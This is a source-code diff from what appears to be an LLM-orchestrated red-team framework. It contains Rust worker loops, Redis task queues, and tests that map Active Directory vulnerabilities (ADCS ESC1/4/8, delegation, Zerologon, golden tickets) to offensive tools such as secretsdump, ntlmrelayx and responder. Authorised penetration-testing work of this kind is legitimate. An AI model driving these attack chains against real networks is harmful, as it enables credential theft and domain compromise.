¶ms); + assert!(tools.is_empty()); + } + + // --- expand_crack_task --- + + #[test] + fn test_expand_crack_task_default_hashcat() { + let params = json!({"hash_value": "abc123", "hash_type": "ntlm"}); + let tools = expand_crack_task(¶ms); + assert_eq!(tools.len(), 1); + assert_eq!(tools[0].0, "crack_with_hashcat"); + } + + #[test] + fn test_expand_crack_task_john() { + let params = json!({"hash_value": "abc123", "use_john": true}); + let tools = expand_crack_task(¶ms); + assert_eq!(tools[0].0, "crack_with_john"); + } + + // --- expand_exploit_task --- + + #[test] + fn test_expand_exploit_delegation() { + let params = json!({"vuln_type": "constrained_delegation", "target_ip": "192.168.58.10"}); + let tools = expand_exploit_task(¶ms); + assert_eq!(tools.len(), 1); + assert_eq!(tools[0].0, "s4u_attack"); + } + + #[test] + fn test_expand_exploit_adcs_variants() { + for (vuln_type, expected_tool) in &[ + ("esc1", "certipy_request"), + ("adcs_esc1", "certipy_request"), + ("esc4", "certipy_esc4_full_chain"), + ("esc8", "ntlmrelayx_to_adcs"), + ] { + let params = json!({"vuln_type": vuln_type}); + let tools = expand_exploit_task(¶ms); + assert_eq!( + tools[0].0, *expected_tool, + "Failed for vuln_type: {vuln_type}" + ); + } + } + + #[test] + fn test_expand_exploit_other_types() { + for (vuln_type, expected) in &[ + ("krbtgt_hash", "generate_golden_ticket"), + ("rbcd", "rbcd_write"), + ("nopac", "nopac"), + ("zerologon", "zerologon_check"), + ("mssql_access", "mssql_enum_impersonation"), + ] { + let params = json!({"vuln_type": vuln_type}); + let tools = expand_exploit_task(¶ms); + assert_eq!(tools[0].0, *expected, "Failed for vuln_type: {vuln_type}"); + } + } + + #[test] + fn test_expand_exploit_unknown_type_empty() { + let params = json!({"vuln_type": "unknown_vuln"}); + let tools = expand_exploit_task(¶ms); + assert!(tools.is_empty()); + } +} diff --git a/ares-cli/src/worker/task_loop/mod.rs b/ares-cli/src/worker/task_loop/mod.rs new file mode 100644 index 00000000..129db781 --- /dev/null +++ b/ares-cli/src/worker/task_loop/mod.rs @@ -0,0 +1,236 @@ +//! Core task consumption loop. +//! +//! ```text +//! loop { +//! 1. BRPOP from ares:tasks:{role} +//! 2. Deserialize TaskMessage +//! 3. Update task status to "running" +//! 4. Execute agent task (native Rust) +//! 5. Parse result +//! 6. Serialize TaskResult +//! 7. LPUSH to ares:results:{task_id} +//! 8. Update task status to "completed" or "failed" +//! 9. Refresh heartbeat status +//! } +//! ``` + +mod executor; +mod result_handler; +pub mod types; + +use types::TaskMessage; + +use std::sync::Arc; +use std::time::Duration; + +use tracing::{debug, error, info, warn}; + +use crate::worker::config::WorkerConfig; +use crate::worker::heartbeat::WorkerStatus; + +// ─── Redis key prefixes (must match Python's RedisTaskQueue) ───────────────── + +const TASK_QUEUE_PREFIX: &str = "ares:tasks"; +const RESULT_QUEUE_PREFIX: &str = "ares:results"; +const TASK_STATUS_PREFIX: &str = "ares:task_status"; + +/// TTL for task status keys — 24 hours, matches Python. +const TASK_STATUS_TTL: i64 = 60 * 60 * 24; + +/// TTL for result keys — 24 hours, matches Python's `RESULT_TTL`. +const RESULT_TTL: i64 = 60 * 60 * 24; + +// ─── Task loop ─────────────────────────────────────────────────────────────── + +/// Run the main task consumption loop until shutdown is signalled. +pub async fn run_task_loop( + config: &WorkerConfig, + conn: redis::aio::ConnectionManager, + status_tx: tokio::sync::watch::Sender, + shutdown: Arc, +) -> anyhow::Result<()> { + let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", config.worker_role); + info!( + queue = %queue_key, + agent = %config.agent_name, + "Starting task loop" + ); + + let mut conn = conn; + + // Exponential backoff state for connection errors + let mut retry_delay = Duration::from_secs(1); + let max_retry_delay = Duration::from_secs(60); + + loop { + // Race BRPOP against shutdown signal + let poll_result = tokio::select! { + result = poll_task(&mut conn, &queue_key, config.poll_timeout) => result, + _ = shutdown.notified() => { + info!("Task loop: shutdown signalled, finishing"); + break; + } + }; + + match poll_result { + Ok(Some(task)) => { + // Reset backoff on successful poll + retry_delay = Duration::from_secs(1); + + // Update heartbeat status to busy + let _ = status_tx.send(WorkerStatus { + status: "busy".to_string(), + current_task: Some(task.task_id.clone()), + }); + + // Execute the task — runs to completion even if shutdown arrives mid-task + result_handler::process_task(&mut conn, config, &task).await; + + // Update heartbeat status back to idle + let _ = status_tx.send(WorkerStatus { + status: "idle".to_string(), + current_task: None, + }); + } + Ok(None) => { + // No task available (BRPOP timeout), just loop + retry_delay = Duration::from_secs(1); + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = [ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + ] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + // ConnectionManager auto-reconnects; just back off before retrying + warn!( + delay_secs = retry_delay.as_secs(), + "Task loop: connection error, retrying: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown.notified() => break, + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + } else { + error!("Task loop: non-connection error: {e}"); + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(5)) => {} + _ = shutdown.notified() => break, + } + retry_delay = Duration::from_secs(1); + } + } + } + } + + Ok(()) +} + +/// BRPOP from the task queue with timeout. +/// Returns `Ok(None)` on timeout (no task available). +async fn poll_task( + conn: &mut redis::aio::ConnectionManager, + queue_key: &str, + timeout: Duration, +) -> anyhow::Result> { + // BRPOP returns Option<(key, value)> + let result: Option<(String, String)> = redis::cmd("BRPOP") + .arg(queue_key) + .arg(timeout.as_secs() as i64) + .query_async(conn) + .await?; + + match result { + Some((_key, data)) => { + let task: TaskMessage = serde_json::from_str(&data)?; + debug!(task_id = %task.task_id, task_type = %task.task_type, "Received task"); + Ok(Some(task)) + } + None => Ok(None), + } +} + +#[cfg(test)] +mod tests { + use super::*; + use types::TaskResult; + + #[test] + fn task_message_roundtrip() { + let msg = TaskMessage { + task_id: "task-123".into(), + task_type: "recon".into(), + source_agent: "orchestrator".into(), + target_agent: "ares-recon-0".into(), + payload: serde_json::json!({"target_ip": "192.168.58.1"}), + priority: 3, + created_at: Some("2026-04-07T10:00:00Z".into()), + callback_queue: None, + }; + let json = serde_json::to_string(&msg).unwrap(); + let msg2: TaskMessage = serde_json::from_str(&json).unwrap(); + assert_eq!(msg.task_id, msg2.task_id); + assert_eq!(msg.task_type, msg2.task_type); + assert_eq!(msg.priority, msg2.priority); + } + + #[test] + fn task_message_default_priority() { + let json = r#"{ + "task_id": "t1", + "task_type": "recon", + "source_agent": "orch", + "target_agent": "recon-0", + "payload": {} + }"#; + let msg: TaskMessage = serde_json::from_str(json).unwrap(); + assert_eq!(msg.priority, 5); // default + } + + #[test] + fn task_result_success() { + let r = TaskResult::success( + "t1", + serde_json::json!({"output": "done"}), + "pod-0", + "ares-recon", + ); + assert!(r.success); + assert!(r.error.is_none()); + assert!(r.result.is_some()); + assert!(r.completed_at.is_some()); + assert_eq!(r.worker_pod.as_deref(), Some("pod-0")); + } + + #[test] + fn task_result_failure() { + let r = TaskResult::failure("t1", "timeout".into(), None, "pod-0", "ares-recon"); + assert!(!r.success); + assert_eq!(r.error.as_deref(), Some("timeout")); + assert!(r.result.is_none()); + } + + #[test] + fn task_result_skip_serializing_none() { + let r = TaskResult::success("t1", serde_json::json!("ok"), "pod", "agent"); + let json = serde_json::to_string(&r).unwrap(); + // error field should be absent (skip_serializing_if = "Option::is_none") + assert!(!json.contains("\"error\"")); + } + + #[test] + fn redis_key_prefixes() { + assert_eq!(TASK_QUEUE_PREFIX, "ares:tasks"); + assert_eq!(RESULT_QUEUE_PREFIX, "ares:results"); + assert_eq!(TASK_STATUS_PREFIX, "ares:task_status"); + } +} diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs new file mode 100644 index 00000000..a185d89d --- /dev/null +++ b/ares-cli/src/worker/task_loop/result_handler.rs @@ -0,0 +1,215 @@ +//! Result processing — build TaskResult, push to Redis, track token usage. + +use chrono::Utc; +use redis::AsyncCommands; +use tracing::{debug, error, info, warn}; + +use ares_core::token_usage; + +use crate::worker::config::WorkerConfig; + +use super::executor::run_agent_task; +use super::types::{TaskMessage, TaskResult}; +use super::{RESULT_QUEUE_PREFIX, RESULT_TTL, TASK_STATUS_PREFIX, TASK_STATUS_TTL}; + +/// Process a single task: set status, run agent, push result. +pub async fn process_task( + conn: &mut redis::aio::ConnectionManager, + config: &WorkerConfig, + task: &TaskMessage, +) { + let started_at = Utc::now().to_rfc3339(); + + info!( + task_id = %task.task_id, + task_type = %task.task_type, + agent = %config.agent_name, + "Processing task" + ); + + // 1. Set task status to "running" + if let Err(e) = set_task_status( + conn, + &task.task_id, + "running", + &serde_json::json!({ + "operation_id": config.operation_id, + "role": config.worker_role, + "agent_name": config.agent_name, + "pod_name": config.pod_name, + "task_type": task.task_type, + "payload": task.payload, + "started_at": started_at, + }), + ) + .await + { + warn!(task_id = %task.task_id, "Failed to set task status to running: {e}"); + } + + // 2. Run the agent task + let agent_result = run_agent_task(&task.task_type, &task.payload, config.task_timeout).await; + + // 3. Extract token usage before consuming agent_result (for Redis tracking) + let usage_for_tracking = agent_result.as_ref().ok().and_then(|ar| ar.usage.clone()); + + // 4. Build the result + let (task_result, final_status) = match agent_result { + Ok(ar) => { + if let Some(ref err) = ar.error { + // Agent returned an error (e.g., unsupported task, max steps, model refusal) + let result_payload = serde_json::json!({ + "output": ar.output, + "task_type": task.task_type, + }); + ( + TaskResult::failure( + &task.task_id, + err.clone(), + Some(result_payload), + &config.pod_name, + &config.agent_name, + ), + "failed", + ) + } else { + let mut result_payload = serde_json::json!({ + "output": ar.output, + "task_type": task.task_type, + }); + // Include usage metrics if available + if let Some(ref usage) = ar.usage { + result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); + } + // Include structured discoveries parsed from tool output + if let Some(ref disc) = ar.discoveries { + if let Some(obj) = disc.as_object() { + for (k, v) in obj { + result_payload[k] = v.clone(); + } + } + } + ( + TaskResult::success( + &task.task_id, + result_payload, + &config.pod_name, + &config.agent_name, + ), + "completed", + ) + } + } + Err(e) => { + let error_msg = format!("{e}"); + error!( + task_id = %task.task_id, + "Agent task failed: {error_msg}" + ); + ( + TaskResult::failure( + &task.task_id, + error_msg, + None, + &config.pod_name, + &config.agent_name, + ), + "failed", + ) + } + }; + + // 5. Accumulate token usage to Redis (best-effort, never fails the task) + if let Some(ref usage) = usage_for_tracking { + if usage.total_tokens > 0 { + if let Some(ref op_id) = config.operation_id { + let model = usage.model.as_deref().unwrap_or(""); + if let Err(e) = token_usage::increment_token_usage( + conn, + op_id, + usage.input_tokens, + usage.output_tokens, + model, + ) + .await + { + debug!(task_id = %task.task_id, "Failed to increment token usage: {e}"); + } + } + } + } + + // 6. LPUSH result to ares:results:{task_id} + let result_key = format!("{RESULT_QUEUE_PREFIX}:{}", task.task_id); + match serde_json::to_string(&task_result) { + Ok(result_json) => { + if let Err(e) = push_result(conn, &result_key, &result_json).await { + error!(task_id = %task.task_id, "Failed to push result: {e}"); + } + } + Err(e) => { + error!(task_id = %task.task_id, "Failed to serialize result: {e}"); + } + } + + // 7. Update task status to final state + if let Err(e) = set_task_status( + conn, + &task.task_id, + final_status, + &serde_json::json!({ + "operation_id": config.operation_id, + "role": config.worker_role, + "agent_name": config.agent_name, + "pod_name": config.pod_name, + "task_type": task.task_type, + "ended_at": Utc::now().to_rfc3339(), + }), + ) + .await + { + warn!(task_id = %task.task_id, "Failed to set task status to {final_status}: {e}"); + } + + match final_status { + "completed" => info!(task_id = %task.task_id, "Task completed"), + _ => warn!(task_id = %task.task_id, "Task failed"), + } +} + +/// Push a result to the result queue and set TTL. +async fn push_result( + conn: &mut redis::aio::ConnectionManager, + result_key: &str, + result_json: &str, +) -> anyhow::Result<()> { + conn.lpush::<_, _, ()>(result_key, result_json).await?; + conn.expire::<_, ()>(result_key, RESULT_TTL).await?; + Ok(()) +} + +/// Set task status in Redis with TTL. +/// Matches Python's `set_task_status` — writes JSON to `ares:task_status:{task_id}`. +async fn set_task_status( + conn: &mut redis::aio::ConnectionManager, + task_id: &str, + status: &str, + extra_fields: &serde_json::Value, +) -> anyhow::Result<()> { + let key = format!("{TASK_STATUS_PREFIX}:{task_id}"); + let mut data = extra_fields.clone(); + if let Some(obj) = data.as_object_mut() { + obj.insert( + "status".to_string(), + serde_json::Value::String(status.to_string()), + ); + obj.insert( + "updated_at".to_string(), + serde_json::Value::String(Utc::now().to_rfc3339()), + ); + } + let json_str = serde_json::to_string(&data)?; + conn.set_ex::<_, _, ()>(&key, &json_str, TASK_STATUS_TTL as u64) + .await?; + Ok(()) +} diff --git a/ares-cli/src/worker/task_loop/types.rs b/ares-cli/src/worker/task_loop/types.rs new file mode 100644 index 00000000..4e5282b8 --- /dev/null +++ b/ares-cli/src/worker/task_loop/types.rs @@ -0,0 +1,180 @@ +//! Wire types and agent result structs for the task loop. + +use chrono::Utc; +use serde::{Deserialize, Serialize}; + +// ─── Agent result types ────────────────────────────────────────────────────── + +/// Result from running an agent task. +#[derive(Debug, Clone)] +pub struct AgentResult { + /// Raw text output from the agent. + pub output: String, + /// Whether the agent encountered an error. + pub error: Option, + /// Token usage metrics from the LLM call. + pub usage: Option, + /// Structured discoveries parsed from tool output (hosts, creds, hashes, vulns). + pub discoveries: Option, +} + +/// LLM token usage counters. +#[derive(Debug, Clone, serde::Serialize)] +pub struct TokenUsage { + pub input_tokens: u64, + pub output_tokens: u64, + pub total_tokens: u64, + /// Model name (e.g. "openai/gpt-4.1-mini"). + #[serde(default, skip_serializing_if = "Option::is_none")] + pub model: Option, +} + +// ─── Wire types (match Python's Pydantic models exactly) ───────────────────── + +/// Task message from the queue. Matches `TaskMessage` in `task_queue.py`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskMessage { + pub task_id: String, + pub task_type: String, + pub source_agent: String, + pub target_agent: String, + pub payload: serde_json::Value, + #[serde(default = "default_priority")] + pub priority: i32, + pub created_at: Option, + pub callback_queue: Option, +} + +fn default_priority() -> i32 { + 5 +} + +/// Task result pushed back to orchestrator. Matches `TaskResult` in `task_queue.py`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskResult { + pub task_id: String, + pub success: bool, + #[serde(skip_serializing_if = "Option::is_none")] + pub result: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub error: Option, + pub completed_at: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub worker_pod: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub agent_name: Option, +} + +impl TaskResult { + pub fn success( + task_id: &str, + result: serde_json::Value, + pod_name: &str, + agent_name: &str, + ) -> Self { + Self { + task_id: task_id.to_string(), + success: true, + result: Some(result), + error: None, + completed_at: Some(Utc::now().to_rfc3339()), + worker_pod: Some(pod_name.to_string()), + agent_name: Some(agent_name.to_string()), + } + } + + pub fn failure( + task_id: &str, + error: String, + result: Option, + pod_name: &str, + agent_name: &str, + ) -> Self { + Self { + task_id: task_id.to_string(), + success: false, + result, + error: Some(error), + completed_at: Some(Utc::now().to_rfc3339()), + worker_pod: Some(pod_name.to_string()), + agent_name: Some(agent_name.to_string()), + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use serde_json::json; + + #[test] + fn test_task_result_success() { + let result = TaskResult::success("task-1", json!({"output": "done"}), "pod-1", "recon"); + assert!(result.success); + assert!(result.error.is_none()); + assert_eq!(result.task_id, "task-1"); + assert!(result.result.is_some()); + assert_eq!(result.worker_pod.as_deref(), Some("pod-1")); + assert_eq!(result.agent_name.as_deref(), Some("recon")); + assert!(result.completed_at.is_some()); + } + + #[test] + fn test_task_result_failure() { + let result = TaskResult::failure( + "task-2", + "timeout".to_string(), + Some(json!({"partial": true})), + "pod-1", + "lateral", + ); + assert!(!result.success); + assert_eq!(result.error.as_deref(), Some("timeout")); + assert!(result.result.is_some()); + } + + #[test] + fn test_task_result_failure_no_result() { + let result = TaskResult::failure("task-3", "crash".to_string(), None, "pod-1", "recon"); + assert!(!result.success); + assert!(result.result.is_none()); + } + + #[test] + fn test_task_message_deserialize() { + let json = json!({ + "task_id": "t-1", + "task_type": "recon", + "source_agent": "orchestrator", + "target_agent": "recon-1", + "payload": {"target_ip": "192.168.58.10"}, + "priority": 3, + "created_at": "2026-04-08T12:00:00Z" + }); + let msg: TaskMessage = serde_json::from_value(json).unwrap(); + assert_eq!(msg.task_id, "t-1"); + assert_eq!(msg.task_type, "recon"); + assert_eq!(msg.priority, 3); + assert!(msg.callback_queue.is_none()); + } + + #[test] + fn test_task_message_default_priority() { + let json = json!({ + "task_id": "t-1", + "task_type": "recon", + "source_agent": "orchestrator", + "target_agent": "recon-1", + "payload": {} + }); + let msg: TaskMessage = serde_json::from_value(json).unwrap(); + assert_eq!(msg.priority, 5); // default + } + + #[test] + fn test_task_result_serialization_skips_none() { + let result = TaskResult::success("t-1", json!({"ok": true}), "pod-1", "recon"); + let serialized = serde_json::to_value(&result).unwrap(); + assert!(serialized.get("error").is_none()); + } +} diff --git a/ares-cli/src/worker/tool_check.rs b/ares-cli/src/worker/tool_check.rs new file mode 100644 index 00000000..52eb9c9b --- /dev/null +++ b/ares-cli/src/worker/tool_check.rs @@ -0,0 +1,273 @@ +//! Tool availability check at worker startup. +//! +//! Probes which external binaries are installed so we can log warnings +//! for missing tools and optionally report the inventory to the orchestrator +//! via Redis. +//! +//! Tool lists are generated at compile time from `tools.yaml` by +//! `build.rs`. See that file for the authoritative reference of expected +//! tools per role. + +use std::collections::BTreeMap; + +use tracing::{info, warn}; + +// Pull in `WORKER_ROLES` and `tools_for_role()` generated by build.rs +// from tools.yaml. +include!(concat!(env!("OUT_DIR"), "/tool_tables.rs")); + +/// Check which tools are available in $PATH for the given role. +/// +/// Returns a map of tool_name → available (true/false). +/// Logs warnings for missing tools but does not fail. +pub async fn check_tools(role: &str) -> BTreeMap { + let tools = tools_for_role(role); + let mut inventory = BTreeMap::new(); + + for &tool in tools { + let available = is_in_path(tool).await; + inventory.insert(tool.to_string(), available); + } + + let available: Vec<&str> = inventory + .iter() + .filter(|(_, &v)| v) + .map(|(k, _)| k.as_str()) + .collect(); + let missing: Vec<&str> = inventory + .iter() + .filter(|(_, &v)| !v) + .map(|(k, _)| k.as_str()) + .collect(); + + info!( + role = role, + available_count = available.len(), + missing_count = missing.len(), + "Tool availability check complete" + ); + + if !missing.is_empty() { + warn!( + role = role, + missing = ?missing, + "Some tools are not installed — tasks requiring them will fail" + ); + } + + inventory +} + +/// Publish tool inventory to Redis so the orchestrator can see what +/// each worker has available. +pub async fn publish_inventory( + conn: &mut redis::aio::ConnectionManager, + agent_name: &str, + inventory: &BTreeMap, +) { + use redis::AsyncCommands; + + let key = format!("ares:tools:{agent_name}"); + let available: Vec<&str> = inventory + .iter() + .filter(|(_, &v)| v) + .map(|(k, _)| k.as_str()) + .collect(); + + match serde_json::to_string(&available) { + Ok(json) => { + let result: Result<(), _> = conn.set_ex(&key, &json, 3600).await; + if let Err(e) = result { + warn!("Failed to publish tool inventory: {e}"); + } + } + Err(e) => warn!("Failed to serialize tool inventory: {e}"), + } +} + +/// Check if a binary is available in PATH using `which`. +async fn is_in_path(binary: &str) -> bool { + tokio::process::Command::new("which") + .arg(binary) + .stdout(std::process::Stdio::null()) + .stderr(std::process::Stdio::null()) + .status() + .await + .is_ok_and(|s| s.success()) +} + +#[cfg(test)] +mod tests { + use super::*; + + /// All known worker roles must have a non-empty tool list. + #[test] + fn all_roles_have_tools() { + for role in WORKER_ROLES { + let tools = tools_for_role(role); + assert!(!tools.is_empty(), "Role {role} should have tools"); + } + } + + #[test] + fn unknown_role_returns_empty() { + assert!(tools_for_role("nonexistent").is_empty()); + } + + /// No duplicate entries within a single role's tool list. + #[test] + fn no_duplicate_tools_per_role() { + for role in WORKER_ROLES { + let tools = tools_for_role(role); + let mut seen = std::collections::HashSet::new(); + for tool in tools { + assert!( + seen.insert(tool), + "Duplicate tool '{tool}' in role '{role}'" + ); + } + } + } + + // --------------------------------------------------------------- + // Per-role expected tool assertions. + // + // These validate that tools.yaml contains the expected tools. + // When Ansible provisioning changes, update tools.yaml. + // --------------------------------------------------------------- + + #[test] + fn recon_has_expected_tools() { + let tools = tools_for_role("recon"); + for expected in &[ + "nmap", + "netexec", + "bloodhound-python", + "ldapsearch", + "enum4linux", + "certipy", + "impacket-GetNPUsers", + "impacket-GetUserSPNs", + ] { + assert!( + tools.contains(expected), + "recon missing expected tool: {expected}" + ); + } + } + + #[test] + fn credential_access_has_expected_tools() { + let tools = tools_for_role("credential_access"); + for expected in &[ + "impacket-GetUserSPNs", + "impacket-GetNPUsers", + "impacket-secretsdump", + "lsassy", + "smbclient", + "gMSADumper", + ] { + assert!( + tools.contains(expected), + "credential_access missing expected tool: {expected}" + ); + } + // netexec is NOT installed on credential_access (only on RECON) + assert!( + !tools.contains(&"netexec"), + "credential_access must NOT have netexec (recon-only)" + ); + } + + #[test] + fn cracker_has_expected_tools() { + let tools = tools_for_role("cracker"); + assert!(tools.contains(&"hashcat")); + assert!(tools.contains(&"john")); + } + + #[test] + fn acl_has_expected_tools() { + let tools = tools_for_role("acl"); + for expected in &["bloodyAD", "pywhisker", "impacket-dacledit", "rpcclient"] { + assert!( + tools.contains(expected), + "acl missing expected tool: {expected}" + ); + } + } + + #[test] + fn privesc_has_expected_tools() { + let tools = tools_for_role("privesc"); + for expected in &[ + "certipy", + "lsassy", + "nopac", + "printnightmare", + "printerbug", + "addspn", + "dnstool", + "impacket-findDelegation", + "impacket-getST", + "impacket-ticketer", + "impacket-secretsdump", + "impacket-psexec", + "KrbRelayUp", + ] { + assert!( + tools.contains(expected), + "privesc missing expected tool: {expected}" + ); + } + } + + #[test] + fn lateral_has_expected_tools() { + let tools = tools_for_role("lateral"); + for expected in &[ + "evil-winrm", + "impacket-psexec", + "impacket-wmiexec", + "impacket-smbexec", + "impacket-secretsdump", + "xfreerdp", + "sshpass", + "proxychains4", + "pth-winexe", + ] { + assert!( + tools.contains(expected), + "lateral missing expected tool: {expected}" + ); + } + } + + #[test] + fn coercion_has_expected_tools() { + let tools = tools_for_role("coercion"); + for expected in &[ + "responder", + "mitm6", + "coercer", + "dfscoerce", + "printerbug", + "addspn", + "dnstool", + "impacket-ntlmrelayx", + ] { + assert!( + tools.contains(expected), + "coercion missing expected tool: {expected}" + ); + } + } + + #[tokio::test] + async fn which_finds_basic_commands() { + // `which` itself should always be available + assert!(is_in_path("which").await); + // A nonsense binary should not be found + assert!(!is_in_path("nonexistent_binary_xyz_12345").await); + } +} diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs new file mode 100644 index 00000000..9864636c --- /dev/null +++ b/ares-cli/src/worker/tool_executor.rs @@ -0,0 +1,452 @@ +//! Thin tool executor loop for LLM-driven orchestration. +//! +//! When the Rust orchestrator drives agent loops via `ARES_LLM_MODEL`, it +//! dispatches individual tool calls to `ares:tool_exec:{role}` and waits +//! for results on `ares:tool_results:{call_id}`. +//! +//! This module implements the worker-side consumer: +//! +//! ```text +//! loop { +//! 1. BRPOP from ares:tool_exec:{role} +//! 2. Deserialize ToolExecRequest +//! 3. Execute tool via ares_tools::dispatch() +//! 4. Serialize ToolExecResponse +//! 5. LPUSH to ares:tool_results:{call_id} +//! } +//! ``` +//! + +use std::sync::Arc; +use std::time::Duration; + +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use tracing::{debug, error, info, warn, Instrument}; + +use ares_core::telemetry::propagation::set_span_parent; +use ares_core::telemetry::spans::{trace_discovery, AgentSpanBuilder, SpanKind, Team}; +use ares_core::telemetry::target::{extract_target_info, infer_target_type_from_info}; + +use crate::worker::config::WorkerConfig; +use crate::worker::heartbeat::WorkerStatus; + +// ─── Redis key prefixes (must match orchestrator's tool_dispatcher.rs) ─────── + +const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; +const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; + +/// TTL for result keys (1 hour) — matches orchestrator's RESULT_TTL_SECS. +const RESULT_TTL: i64 = 3600; + +// ─── Wire types (match orchestrator's tool_dispatcher.rs exactly) ──────────── + +/// Request from the orchestrator's RedisToolDispatcher. +#[derive(Debug, Deserialize)] +struct ToolExecRequest { + call_id: String, + task_id: String, + tool_name: String, + arguments: serde_json::Value, + /// W3C traceparent header for cross-service span linking. + #[serde(default)] + traceparent: Option, + /// Operation ID for span correlation with dashboards. + #[serde(default)] + operation_id: Option, +} + +/// Response pushed back to the orchestrator. +#[derive(Debug, Serialize)] +struct ToolExecResponse { + call_id: String, + output: String, + error: Option, + /// Structured discoveries parsed from the tool output. + #[serde(skip_serializing_if = "Option::is_none")] + discoveries: Option, +} + +// ─── Tool executor loop ───────────────────────────────────────────────────── + +/// Run the tool execution loop until shutdown is signalled. +/// +/// Consumes individual tool call requests from `ares:tool_exec:{role}` and +/// dispatches them directly to `ares_tools::dispatch()`. Results are pushed +/// back to the per-call mailbox `ares:tool_results:{call_id}`. +pub async fn run_tool_exec_loop( + config: &WorkerConfig, + conn: redis::aio::ConnectionManager, + status_tx: tokio::sync::watch::Sender, + shutdown: Arc, +) -> anyhow::Result<()> { + let queue_key = format!("{TOOL_EXEC_PREFIX}:{}", config.worker_role); + info!( + queue = %queue_key, + agent = %config.agent_name, + "Starting tool executor loop" + ); + + let mut conn = conn; + + // Track tools that failed with "not installed" so we can short-circuit + // future calls immediately without attempting to spawn the binary. + let mut unavailable_tools: std::collections::HashSet = std::collections::HashSet::new(); + + // Exponential backoff state for connection errors + let mut retry_delay = Duration::from_secs(1); + let max_retry_delay = Duration::from_secs(60); + + loop { + // Check for shutdown via select with zero-timeout + let poll_result = tokio::select! { + result = poll_tool_request(&mut conn, &queue_key, config.poll_timeout) => result, + _ = shutdown.notified() => { + info!("Tool executor: shutdown signalled, finishing"); + return Ok(()); + } + }; + + match poll_result { + Ok(Some(request)) => { + retry_delay = Duration::from_secs(1); + + // Update heartbeat to busy + let _ = status_tx.send(WorkerStatus { + status: "busy".to_string(), + current_task: Some(format!("{}:{}", request.tool_name, request.call_id)), + }); + + let ti = extract_target_info(&request.arguments); + let tt = infer_target_type_from_info(&ti); + let mut span_builder = + AgentSpanBuilder::new("tool_exec", &config.worker_role, Team::Red) + .tool(&request.tool_name) + .kind(SpanKind::Consumer); + if let Some(ref ip) = ti.target_ip { + span_builder = span_builder.target_ip(ip); + } + if let Some(ref fqdn) = ti.target_fqdn { + span_builder = span_builder.target_fqdn(fqdn); + } + if let Some(ref user) = ti.target_user { + span_builder = span_builder.target_user(user); + } + if let Some(target_type) = tt { + span_builder = span_builder.target_type(target_type); + } + if let Some(ref op) = request.operation_id { + span_builder = span_builder.operation_id(op); + } + let exec_span = span_builder.build(); + if let Some(ref tp) = request.traceparent { + set_span_parent(&exec_span, tp); + } + execute_and_respond(&mut conn, &request, &mut unavailable_tools) + .instrument(exec_span) + .await; + + // Back to idle + let _ = status_tx.send(WorkerStatus { + status: "idle".to_string(), + current_task: None, + }); + } + Ok(None) => { + // BRPOP timeout, no request — just loop + retry_delay = Duration::from_secs(1); + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = [ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + ] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + // ConnectionManager auto-reconnects; just back off before retrying + warn!( + delay_secs = retry_delay.as_secs(), + "Tool executor: connection error, retrying: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + } else { + error!("Tool executor: non-connection error: {e}"); + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(5)) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = Duration::from_secs(1); + } + } + } + } +} + +/// BRPOP a single tool execution request from the queue. +async fn poll_tool_request( + conn: &mut redis::aio::ConnectionManager, + queue_key: &str, + timeout: Duration, +) -> anyhow::Result> { + let result: Option<(String, String)> = redis::cmd("BRPOP") + .arg(queue_key) + .arg(timeout.as_secs() as i64) + .query_async(conn) + .await?; + + match result { + Some((_key, data)) => { + let request: ToolExecRequest = serde_json::from_str(&data)?; + debug!( + tool = %request.tool_name, + call_id = %request.call_id, + task_id = %request.task_id, + "Received tool exec request" + ); + Ok(Some(request)) + } + None => Ok(None), + } +} + +/// Execute a tool call and push the result to Redis. +/// +/// If the tool has previously failed with "not installed", short-circuits +/// immediately without attempting to spawn the binary. +async fn execute_and_respond( + conn: &mut redis::aio::ConnectionManager, + request: &ToolExecRequest, + unavailable_tools: &mut std::collections::HashSet, +) { + // Short-circuit if this tool is known to be unavailable + if unavailable_tools.contains(&request.tool_name) { + debug!( + tool = %request.tool_name, + call_id = %request.call_id, + "Skipping unavailable tool (previously failed to spawn)" + ); + let response = ToolExecResponse { + call_id: request.call_id.clone(), + output: String::new(), + error: Some(format!( + "Tool '{}' is not installed on this worker. \ + Do not call this tool again — it failed to spawn previously.", + request.tool_name + )), + discoveries: None, + }; + let result_key = format!("{TOOL_RESULT_PREFIX}:{}", request.call_id); + if let Ok(json) = serde_json::to_string(&response) { + let _ = push_result(conn, &result_key, &json).await; + } + return; + } + + info!( + tool = %request.tool_name, + call_id = %request.call_id, + task_id = %request.task_id, + "Executing tool" + ); + + let di = extract_target_info(&request.arguments); + let dt = infer_target_type_from_info(&di); + + let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await { + Ok(output) => { + // Raw output for structured parsers (need unfiltered data) + let raw = output.combined_raw(); + // Filtered output for LLM (strips MOTD, noise, etc.) + let combined = output.combined(); + let error = if output.success { + None + } else { + Some(format!("tool exited with code 